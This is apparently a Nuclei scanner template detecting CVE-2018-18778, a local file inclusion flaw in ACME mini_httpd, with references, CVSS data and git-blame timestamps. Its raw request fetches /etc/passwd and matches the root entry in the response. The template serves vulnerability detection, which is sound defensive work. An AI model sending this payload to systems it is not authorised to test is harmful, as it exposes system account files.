nuclei-templates/http/cves/2018/CVE-2018-18778.yaml

37 lines
869 B
YAML
Raw Normal View History

2021-02-25 16:05:18 +00:00
id: CVE-2018-18778
info:
name: ACME mini_httpd <1.30 - Local File Inclusion
2021-02-25 16:05:18 +00:00
author: dhiyaneshDK
severity: medium
description: ACME mini_httpd before 1.30 is vulnerable to local file inclusion.
reference:
- https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/
- http://www.acme.com/software/mini_httpd/
- https://nvd.nist.gov/vuln/detail/CVE-2018-18778
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2018-18778
cwe-id: CWE-200
2022-06-29 09:23:06 +00:00
tags: cve,cve2018,lfi,mini_httpd
2021-03-11 16:22:34 +00:00
http:
2021-02-25 16:05:18 +00:00
- raw:
- |+
GET /etc/passwd HTTP/1.1
2021-03-11 20:16:35 +00:00
Host:
2021-02-25 16:05:18 +00:00
unsafe: true
matchers-condition: and
matchers:
- type: status
status:
- 200
2021-02-25 16:05:18 +00:00
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
# Enhanced by mp on 2022/07/22